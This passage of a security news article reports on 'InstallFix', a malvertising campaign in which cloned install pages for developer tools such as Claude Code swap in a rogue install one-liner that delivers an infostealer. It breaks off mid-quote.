Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign

A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports.

As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones.

One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results.

The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code.

“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real ...